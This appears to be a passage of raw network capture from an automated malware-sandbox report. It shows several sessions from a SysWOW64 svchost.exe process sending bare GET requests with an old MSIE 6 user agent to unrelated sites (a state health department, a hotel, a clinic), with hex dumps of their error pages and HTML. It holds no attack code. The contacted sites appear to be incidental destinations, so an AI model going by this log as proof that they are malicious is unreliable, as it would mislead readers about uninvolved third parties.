                                                                                                                                                                                                                                                                          2023-07-05 06:07:39 UTC5842INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:38 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:39 UTC5842INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          39192.168.2.66275575.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:39 UTC5843OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:39 UTC5843INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:39 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:39 UTC5843INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          4192.168.2.650184104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC86OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC90INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:16 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:16 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          Set-Cookie: django_language=en; expires=Thu, 04-Jul-2024 05:55:16 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=26fElQDlcgZu%2Fi0vcK8TobAGMeCyAeRfCvq3LBG6SP9WfbDV7%2Bj434xVxbtvGnV37ldi8eCQfL16%2F50c2ZCE39btvhG3BO2ZgNCXLtKLbugF7RJQKo9yEscsvvS7Fq2O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d05ed2b2bd6-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC91INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC91INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          40192.168.2.61505104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5844OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5845INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:52 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:52 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u6CDIeI2z2tl5jm1rH0Nx58r1uto4ogykKsSTEXLeO2uxzuGKjwVyVHCRpLh8HmdW53Jf8lWQZqVuQlL7q0mJYNxfXb4eon27a2fiuBCHLNLtpGPPk4637vTTdgr1Ees"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6de6491018e4-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5845INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5845INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          41192.168.2.61595185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5845OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5846INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:43 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5846INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          42192.168.2.61670172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5847OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          Cookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5848INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:43 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wke4u89oJ6SfBgMbIAUGWBP6l%2FwATX8%2Fmcvza5bJjw3ZAUrFM%2FQeCxcIh0CVeaaoLXgUCJiABV%2F15g5Z7QqYVjovano2iSvSzWFokNY2%2B4gIj3ZSN%2B%2BwKa%2BH%2BH5uiN44kMEX8OQCVoU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6de9484f3830-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5848INData Raw: 37 63 61 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7ca5<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5849INData Raw: 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 72 74 5f 73 61 6c 69 65 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: c/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/rt_salient
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5850INData Raw: 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61
                                                                                                                                                                                                                                                                          Data Ascii: .js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.min.js?989da
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5852INData Raw: 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73 69 74 65 20 63 6f 6d 5f 67 61
                                                                                                                                                                                                                                                                          Data Ascii: ss/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry site com_ga
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5853INData Raw: 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                          Data Ascii: "menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div class="g-menu-i
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5854INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74
                                                                                                                                                                                                                                                                          Data Ascii: g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="g-menu-item g-menu-item-t
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5856INData Raw: 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 51 75 69 c3 a9 6e 65 73 20 73 6f 6d 6f 73 20 3c 2f 73 70 61 6e 3e 0a
                                                                                                                                                                                                                                                                          Data Ascii: l></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-title">Quines somos </span>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:43 UTC5857INData Raw: 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74
                                                                                                                                                                                                                                                                          Data Ascii: cionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-t
